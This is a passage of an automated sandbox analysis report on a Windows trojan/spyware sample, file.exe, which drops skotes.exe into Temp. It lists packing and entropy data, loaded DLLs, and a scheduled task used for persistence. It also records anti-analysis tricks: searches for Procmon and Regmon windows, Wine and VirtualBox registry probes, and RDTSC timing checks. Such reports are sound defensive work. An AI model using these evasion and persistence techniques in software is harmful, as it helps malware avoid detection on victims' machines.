                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E9E5306_2_00E9E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED2D106_2_00ED2D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED779B6_2_00ED779B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E94B306_2_00E94B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00EC7F366_2_00EC7F36
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe BACE923F8BE90BF0F398E9310D52723265E250651CB36115BC233CA3300160A6
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00EA7A00 appears 43 times
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9982703933923706
                    Source: file.exeStatic PE information: Section: ihqucnpr ZLIB complexity 0.9945654794045048
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9982703933923706
                    Source: skotes.exe.0.drStatic PE information: Section: ihqucnpr ZLIB complexity 0.9945654794045048
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1863680 > 1048576
                    Source: file.exeStatic PE information: Raw size of ihqucnpr is bigger than: 0x100000 < 0x195200

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ihqucnpr:EW;loaatlni:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: file.exeStatic PE information: real checksum: 0x1c788c should be: 0x1c7fed
                    Source: skotes.exe.0.drStatic PE information: real checksum: 0x1c788c should be: 0x1c7fed
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: ihqucnpr
                    Source: file.exeStatic PE information: section name: loaatlni
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: ihqucnpr
                    Source: skotes.exe.0.drStatic PE information: section name: loaatlni
                    Source: skotes.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00EAD91C push ecx; ret 6_2_00EAD92F
                    Source: file.exeStatic PE information: section name: entropy: 7.984163240337756
                    Source: file.exeStatic PE information: section name: ihqucnpr entropy: 7.953078647253167
                    Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.984163240337756
                    Source: skotes.exe.0.drStatic PE information: section name: ihqucnpr entropy: 7.953078647253167
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F0FD second address: F8F103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107915 second address: 110793D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6F31405BD6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c jmp 00007F6F31405BE9h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop esi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110793D second address: 1107995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF70h 0x00000007 jmp 00007F6F31ADDF6Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F6F31ADDF6Eh 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F6F31ADDF78h 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F6F31ADDF66h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7844 second address: 10F784A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F784A second address: 10F7850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106912 second address: 1106918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106918 second address: 110694E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF76h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110694E second address: 1106952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1106C71 second address: 1106C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F6F31ADDF66h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107044 second address: 1107057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107057 second address: 1107089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F6F31ADDF6Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F6F31ADDF6Ch 0x0000001b jp 00007F6F31ADDF66h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107089 second address: 110708E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1107217 second address: 110721B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109FAC second address: 1109FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109FB2 second address: 1109FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109FC2 second address: 1109FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jno 00007F6F31405BDCh 0x0000000f pushad 0x00000010 jnc 00007F6F31405BD6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109FEB second address: 1109FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A103 second address: 110A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A115 second address: 110A119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A209 second address: 110A236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D1AABh], ecx 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D366Bh] 0x00000017 jmp 00007F6F31405BDBh 0x0000001c push B0F002E2h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A236 second address: 110A23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A454 second address: 110A458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A458 second address: 110A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A45E second address: 110A498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6F31405BDCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 28CACB1Bh 0x00000014 xor edi, 446AA438h 0x0000001a lea ebx, dword ptr [ebp+1244EF20h] 0x00000020 xor di, 772Ah 0x00000025 push edx 0x00000026 mov cx, 1872h 0x0000002a pop edx 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A498 second address: 110A49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127CA6 second address: 1127CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11280CE second address: 11280D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11286D2 second address: 1128707 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6F31405BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F6F31405BE9h 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ja 00007F6F31405C05h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128707 second address: 112870D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112870D second address: 1128711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128711 second address: 112872C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292B5 second address: 11292DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F31405BDBh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11292DA second address: 11292DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F119 second address: 112F13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F31405BD6h 0x0000000a popad 0x0000000b pop esi 0x0000000c jng 00007F6F31405BF2h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F6F31405BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F13C second address: 112F142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAD3A second address: 10FAD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FAD3E second address: 10FAD55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6F31ADDF6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131797 second address: 11317E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F6F31405BE8h 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007F6F31405BE7h 0x00000018 pop esi 0x00000019 pushad 0x0000001a jmp 00007F6F31405BE1h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
